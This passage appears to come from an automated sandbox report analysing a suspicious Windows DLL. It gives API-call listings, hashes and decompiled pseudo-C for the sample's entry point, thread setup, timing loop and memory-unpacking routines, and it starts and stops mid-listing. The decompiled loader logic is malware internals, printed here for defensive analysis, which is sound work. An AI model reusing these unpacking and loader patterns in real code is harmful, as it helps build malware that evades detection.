                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D5A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction ID: f8298283d072e4fc48fcfb5ec16d1f3ae90cb959e10be8ca6ffc9353df4fb204
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A110AF625062AAFDB5616F6DC84F5A235FA7C267DB300724F528D31C0EBA28808CD30
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6E23A304,?,?,6E27C7C4,00000000,?,6E23A42F,00000004,6E2693A4,6E26939C,6E2693A4,00000000), ref: 6E23A2D3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction ID: 4add0e76b800213f7974f452410f2f2f3ea3bbc44c7d122cad41fc2d19ff3337
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011A7F1A4593BABDF729AE9CC44B4933A69B06761F210131ED11A7284D6B1E900CEE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                    			E6E1F1D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                                    				if(SetThreadAffinityMask(_t13, 1) != 0) {
                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff);
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t4 = E6E1F17A7(_a4);
                                                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                    0x6e1f1d3b
                                                                                                                                                                                                                                                                    0x6e1f1d4e
                                                                                                                                                                                                                                                                    0x6e1f1d53
                                                                                                                                                                                                                                                                    0x6e1f1d53
                                                                                                                                                                                                                                                                    0x6e1f1d59
                                                                                                                                                                                                                                                                    0x6e1f1d5e
                                                                                                                                                                                                                                                                    0x6e1f1d62
                                                                                                                                                                                                                                                                    0x6e1f1d66
                                                                                                                                                                                                                                                                    0x6e1f1d66
                                                                                                                                                                                                                                                                    0x6e1f1d70
                                                                                                                                                                                                                                                                    0x6e1f1d79

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6E1F1D35
                                                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1F1D40
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6E1F1D53
                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1F1D66
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                                                    • Opcode ID: 39d0ba6790eec0f05bb1ec29aa3947343bf7ce9f1e54242c8ec98b9857aa8c0f
                                                                                                                                                                                                                                                                    • Instruction ID: ce32353f7b82a2193724d1d1d53c8a69ac4208049f133b9aaf19e9e452ba625d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39d0ba6790eec0f05bb1ec29aa3947343bf7ce9f1e54242c8ec98b9857aa8c0f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61E022B1305710AB93022A694C8CEAFABECDFD23317110336F526D21D0CB508C4BA9E2
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001), ref: 6E247C03
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001,?,6E243E74,6E23F5F6), ref: 6E247C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247BD5: CloseHandle.KERNEL32(6E270910,6E247C1F,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000,00000001), ref: 6E247BE5
                                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E247C1F
                                                                                                                                                                                                                                                                      • Part of subcall function 6E247B97: CreateFileW.KERNEL32(6E26DD58,40000000,00000003,00000000,00000003,00000000,00000000,6E247BC6,6E246B6D,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247BAA
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001,00000000), ref: 6E247C34
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction ID: c5eb5911c063fb28d765f2d7896f0235507a8151d7e1f3577a679bcd0b015d4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5fd61ecb2c54352c8bf2eed2ef41dbc4b347b3992cc299c9179e2be72fe1c13
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F01C3610152DFBDF662FD1CC0CD893F6BFB4A7A1F044410FA29951A0D6728934DBA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-1872383224
                                                                                                                                                                                                                                                                    • Opcode ID: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction ID: 1e53db9646c48c4b6a9a7d16aff94c1e03efa8c9ac5e048a2fe0e03364cc73e4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e1467c51ca839c1c1521eb53528f2bf45432808041f19ef1d97527362e7fec4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6419AF5A4013DAFDB11DBD9CC8599EBBBEEB89B10F304456E5149B200D7708940CF60
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000079C,00003000,00000040,0000079C,6E271E18), ref: 6E272480
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,6E271E7C), ref: 6E2724B7
                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00013F51,00003000,00000040), ref: 6E272517
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E27254D
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00000000,00000004,6E2723A2), ref: 6E272652
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E1F0000,00001000,00000004,6E2723A2), ref: 6E272679
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2), ref: 6E272746
                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2723A2,?), ref: 6E27279C
                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2727B8
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605939244.000000006E271000.00000040.00020000.sdmp, Offset: 6E271000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                    • Opcode ID: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction ID: f17b0aec824730e599b8e1a80d803f161a2cfee727357e17c12446058763471d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff07580d84d1116ad52de69ff726b821f661c6dc75642e126b2e6fdedb51cdd0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7D1AEB66002869FDF11CF54C880F517BA6FF48710B0A45A4EE0AAF75BE771B850DB62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                    			E6E1F17A7(intOrPtr _a4) {
                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                    				struct _SYSTEMTIME _v44;
                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                    				long _v52;
                                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                                                                                    				long _t27;
                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t21 = E6E1F146C();
                                                                                                                                                                                                                                                                    				_v52 = _t21;
                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                                    					return _t21;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                    					GetSystemTime( &_v44);
                                                                                                                                                                                                                                                                    					_t23 = SwitchToThread();
                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                    					_t45 = 9;
                                                                                                                                                                                                                                                                    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
                                                                                                                                                                                                                                                                    					_t26 = E6E1F15A3(0, _t54); // executed
                                                                                                                                                                                                                                                                    					_v56 = _t26;
                                                                                                                                                                                                                                                                    					Sleep(_t54 << 5); // executed
                                                                                                                                                                                                                                                                    					_t21 = _v56;
                                                                                                                                                                                                                                                                    				} while (_t21 == 0xc);
                                                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t27 = E6E1F1C12(_t45);
                                                                                                                                                                                                                                                                    				_v52 = _t27;
                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                                    					_t21 = _v52;
                                                                                                                                                                                                                                                                    					if(_t21 == 0xffffffff) {
                                                                                                                                                                                                                                                                    						_t21 = GetLastError();
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                    					_t56 = E6E1F1CA4(E6E1F16EC,  &_v28);
                                                                                                                                                                                                                                                                    					if(_t56 == 0) {
                                                                                                                                                                                                                                                                    						_v56 = GetLastError();
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
                                                                                                                                                                                                                                                                    						_v56 = _t31;
                                                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                                                    							GetExitCodeThread(_t56,  &_v56);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						CloseHandle(_t56);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				if(E6E1F1D7C(_t45,  &_v48) != 0) {
                                                                                                                                                                                                                                                                    					 *0x6e1f41b8 = 0;
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t44 = _v48;
                                                                                                                                                                                                                                                                    				_t57 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                                                    				_t50 =  *_t57(_t44, 0, 0);
                                                                                                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                    					 *0x6e1f41b8 = _t44;
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t15 = _t50 + 2; // 0x2
                                                                                                                                                                                                                                                                    				_t39 = E6E1F1C8F(_t50 + _t15);
                                                                                                                                                                                                                                                                    				 *0x6e1f41b8 = _t39;
                                                                                                                                                                                                                                                                    				if(_t39 == 0) {
                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					 *_t57(_t44, _t39, _t50);
                                                                                                                                                                                                                                                                    					E6E1F136A(_t44);
                                                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                                                                    0x6e1f17b3
                                                                                                                                                                                                                                                                    0x6e1f17bc
                                                                                                                                                                                                                                                                    0x6e1f17c0
                                                                                                                                                                                                                                                                    0x6e1f18c8
                                                                                                                                                                                                                                                                    0x6e1f18ce
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f17c6
                                                                                                                                                                                                                                                                    0x6e1f17c6
                                                                                                                                                                                                                                                                    0x6e1f17cb
                                                                                                                                                                                                                                                                    0x6e1f17d1
                                                                                                                                                                                                                                                                    0x6e1f17e0
                                                                                                                                                                                                                                                                    0x6e1f17e1
                                                                                                                                                                                                                                                                    0x6e1f17e4
                                                                                                                                                                                                                                                                    0x6e1f17e7
                                                                                                                                                                                                                                                                    0x6e1f17f0
                                                                                                                                                                                                                                                                    0x6e1f17f4
                                                                                                                                                                                                                                                                    0x6e1f17fa
                                                                                                                                                                                                                                                                    0x6e1f17fe
                                                                                                                                                                                                                                                                    0x6e1f1805
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f180b
                                                                                                                                                                                                                                                                    0x6e1f1812
                                                                                                                                                                                                                                                                    0x6e1f1816
                                                                                                                                                                                                                                                                    0x6e1f18b9
                                                                                                                                                                                                                                                                    0x6e1f18b9
                                                                                                                                                                                                                                                                    0x6e1f18c0
                                                                                                                                                                                                                                                                    0x6e1f18c2
                                                                                                                                                                                                                                                                    0x6e1f18c2
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f18c0
                                                                                                                                                                                                                                                                    0x6e1f181f
                                                                                                                                                                                                                                                                    0x6e1f1872
                                                                                                                                                                                                                                                                    0x6e1f1872
                                                                                                                                                                                                                                                                    0x6e1f1883
                                                                                                                                                                                                                                                                    0x6e1f1887
                                                                                                                                                                                                                                                                    0x6e1f18b5
                                                                                                                                                                                                                                                                    0x6e1f1889
                                                                                                                                                                                                                                                                    0x6e1f188c
                                                                                                                                                                                                                                                                    0x6e1f1894
                                                                                                                                                                                                                                                                    0x6e1f1898
                                                                                                                                                                                                                                                                    0x6e1f18a0
                                                                                                                                                                                                                                                                    0x6e1f18a0
                                                                                                                                                                                                                                                                    0x6e1f18a7
                                                                                                                                                                                                                                                                    0x6e1f18a7
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1887
                                                                                                                                                                                                                                                                    0x6e1f182d
                                                                                                                                                                                                                                                                    0x6e1f186c
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f186c
                                                                                                                                                                                                                                                                    0x6e1f182f
                                                                                                                                                                                                                                                                    0x6e1f1833
                                                                                                                                                                                                                                                                    0x6e1f183e
                                                                                                                                                                                                                                                                    0x6e1f1842
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1864
                                                                                                                                                                                                                                                                    0x6e1f1844
                                                                                                                                                                                                                                                                    0x6e1f1849
                                                                                                                                                                                                                                                                    0x6e1f1850
                                                                                                                                                                                                                                                                    0x6e1f1855
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1857
                                                                                                                                                                                                                                                                    0x6e1f185a
                                                                                                                                                                                                                                                                    0x6e1f185d
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f185d

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1F17B8,747863F0,00000000), ref: 6E1F147B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: GetVersion.KERNEL32 ref: 6E1F148A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: GetCurrentProcessId.KERNEL32 ref: 6E1F1499
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1F14B2
                                                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 6E1F17CB
                                                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 6E1F17D1
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E1F15F9
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E1F17EC), ref: 6E1F168B
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E1F16A6
                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,00000000), ref: 6E1F17F4
                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1F183C
                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6E1F185A
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E1F16EC,?,00000000), ref: 6E1F188C
                                                                                                                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1F18A0
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6E1F18A7
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(6E1F16EC,?,00000000), ref: 6E1F18AF
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E1F18C2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.605607675.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605592920.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605617714.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605625541.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.605634328.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2280543912-0
                                                                                                                                                                                                                                                                    • Opcode ID: edbd9656fe77d4e32fdb2c79b0e4c1a6881dd76873a21643cbdf2522d772e7b8
                                                                                                                                                                                                                                                                    • Instruction ID: 36472a92cdf567d5945f8ba3e4795e00056afb3b84ad318b4fc987d32275ecdb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edbd9656fe77d4e32fdb2c79b0e4c1a6881dd76873a21643cbdf2522d772e7b8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8931C3F1A04B11EBC740DFA5994899F77ECEA96350B204E1AF461C2141E730C9CBA7E2
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                                                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                    				char _t9;
                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                    				_t9 = _a8;
                                                                                                                                                                                                                                                                    				_v8 = 1;
                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                    					_t10 = InterlockedDecrement(0x6e1f4188);
                                                                                                                                                                                                                                                                    					__eflags = _t10;
                                                                                                                                                                                                                                                                    					if(_t10 == 0) {
                                                                                                                                                                                                                                                                    						__eflags =  *0x6e1f418c;
                                                                                                                                                                                                                                                                    						if( *0x6e1f418c != 0) {
                                                                                                                                                                                                                                                                    							_t36 = 0x2328;
                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                    								SleepEx(0x64, 1);
                                                                                                                                                                                                                                                                    								__eflags =  *0x6e1f4198;
                                                                                                                                                                                                                                                                    								if( *0x6e1f4198 == 0) {
                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								_t36 = _t36 - 0x64;
                                                                                                                                                                                                                                                                    								__eflags = _t36;
                                                                                                                                                                                                                                                                    								if(_t36 > 0) {
                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    							CloseHandle( *0x6e1f418c);
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    						HeapDestroy( *0x6e1f4190);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					if(_t9 == 1 && InterlockedIncrement(0x6e1f4188) == 1) {
                                                                                                                                                                                                                                                                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                                    						_t41 = _t18;
                                                                                                                                                                                                                                                                    						 *0x6e1f4190 = _t18;
                                                                                                                                                                                                                                                                    						if(_t18 == 0) {
                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							 *0x6e1f41b0 = _a4;
                                                                                                                                                                                                                                                                    							asm("lock xadd [eax], edi");
                                                                                                                                                                                                                                                                    							_push( &_a8);
                                                                                                                                                                                                                                                                    							_t23 = E6E1F1CA4(E6E1F1D32, E6E1F1EE0(_a12, 1, 0x6e1f4198, _t41));
                                                                                                                                                                                                                                                                    							 *0x6e1f418c = _t23;
                                                                                                                                                                                                                                                                    							if(_t23 == 0) {
                                                                                                                                                                                                                                                                    								asm("lock xadd [esi], eax");
                                                                                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                    0x6e1f1e07
                                                                                                                                                                                                                                                                    0x6e1f1e13
                                                                                                                                                                                                                                                                    0x6e1f1e15
                                                                                                                                                                                                                                                                    0x6e1f1e18
                                                                                                                                                                                                                                                                    0x6e1f1e8e
                                                                                                                                                                                                                                                                    0x6e1f1e94
                                                                                                                                                                                                                                                                    0x6e1f1e96
                                                                                                                                                                                                                                                                    0x6e1f1e98
                                                                                                                                                                                                                                                                    0x6e1f1e9e
                                                                                                                                                                                                                                                                    0x6e1f1ea0
                                                                                                                                                                                                                                                                    0x6e1f1ea5
                                                                                                                                                                                                                                                                    0x6e1f1ea8
                                                                                                                                                                                                                                                                    0x6e1f1eb3
                                                                                                                                                                                                                                                                    0x6e1f1eb5
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1eb7
                                                                                                                                                                                                                                                                    0x6e1f1eba
                                                                                                                                                                                                                                                                    0x6e1f1ebc
                                                                                                                                                                                                                                                                    0x00000000
